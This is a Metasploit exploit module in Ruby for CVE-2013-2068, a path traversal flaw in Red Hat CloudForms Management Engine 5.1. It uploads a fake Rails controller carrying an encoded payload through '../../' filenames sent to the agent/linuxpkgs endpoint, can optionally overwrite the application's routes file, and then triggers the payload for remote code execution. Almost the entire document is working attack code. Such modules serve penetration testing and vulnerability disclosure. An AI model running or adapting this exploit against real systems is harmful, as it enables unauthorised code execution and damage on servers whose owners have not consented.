Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
  
def initialize  
super(  
'Name' => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal',  
'Description' => %q{  
This module exploits a path traversal vulnerability in the "linuxpkgs"  
action of "agent" controller of the Red Hat CloudForms Management Engine 5.1  
(ManageIQ Enterprise Virtualization Manager 5.0 and earlier).  
It uploads a fake controller to the controllers directory of the Rails  
application with the encoded payload as an action and sends a request to  
this action to execute the payload. Optionally, it can also upload a routing  
file containing a route to the action. (Which is not necessary, since the  
application already contains a general default route.)  
},  
'Author' => 'Ramon de C Valle',  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2013-2068'],  
['CWE', '22'],  
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=960422']  
],  
'Platform' => 'ruby',  
'Arch' => ARCH_RUBY,  
'Privileged' => true,  
'Targets' =>  
[  
['Automatic', {}]  
],  
'DisclosureDate' => 'Sep 4 2013',  
'DefaultOptions' =>  
{  
'PrependFork' => true,  
'SSL' => true  
},  
'DefaultTarget' => 0  
)  
  
register_options(  
[  
Opt::RPORT(443),  
OptString.new('CONTROLLER', [false, 'The name of the controller']),  
OptString.new('ACTION', [false, 'The name of the action']),  
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),  
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])  
], self.class  
)  
  
register_advanced_options(  
[  
OptBool.new('ROUTES', [true, 'Upload a routing file. Warning: It is not necessary by default and can damage the target application', false]),  
], self.class)  
end  
  
def check  
res = send_request_cgi(  
'uri' => normalize_uri(target_uri.path, "ping.html")  
)  
  
if res and res.code == 200 and res.body.to_s =~ /EVM ping response/  
return Exploit::CheckCode::Detected  
end  
  
return Exploit::CheckCode::Unknown  
end  
  
def exploit  
controller =  
if datastore['CONTROLLER'].blank?  
Rex::Text.rand_text_alpha_lower(rand(9) + 3)  
else  
datastore['CONTROLLER'].downcase  
end  
  
action =  
if datastore['ACTION'].blank?  
Rex::Text.rand_text_alpha_lower(rand(9) + 3)  
else  
datastore['ACTION'].downcase  
end  
  
data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n"  
  
print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...")  
res = upload_file("../../app/controllers/#{controller}_controller.rb", data)  
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?  
register_files_for_cleanup("app/controllers/#{controller}_controller.rb")  
# According to rcvalle, all the version have not been checked  
# so we're not sure if res.code will be always 500, in order  
# to not lose sessions, just print warning and proceeding  
unless res and res.code == 500  
print_warning("Unexpected reply but proceeding anyway...")  
end  
  
if datastore['ROUTES']  
data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n"  
  
print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...")  
res = upload_file("../../config/routes.rb", data)  
fail_with(Failure::Unknown, 'No response from remote host') if res.nil?  
# According to rcvalle, all the version have not been checked  
# so we're not sure if res.code will be always 500, in order  
# to not lose sessions, just print warning and proceeding  
unless res and res.code == 500  
print_warning("Unexpected reply but proceeding anyway...")  
end  
end  
  
print_status("Sending execute request to #{target_url(controller, action)}...")  
send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, controller, action)  
)  
end  
  
def upload_file(filename, data)  
res = send_request_cgi(  
'method' => datastore['HTTP_METHOD'],  
'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),  
"vars_#{datastore['HTTP_METHOD'].downcase}" => {  
'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),  
'filename' => filename,  
'md5' => Rex::Text.md5(data)  
}  
)  
  
return res  
end  
  
def target_url(*args)  
(ssl ? 'https' : 'http') +  
if rport.to_i == 80 || rport.to_i == 443  
"://#{vhost}"  
else  
"://#{vhost}:#{rport}"  
end + normalize_uri(target_uri.path, *args)  
end  
end  
  
`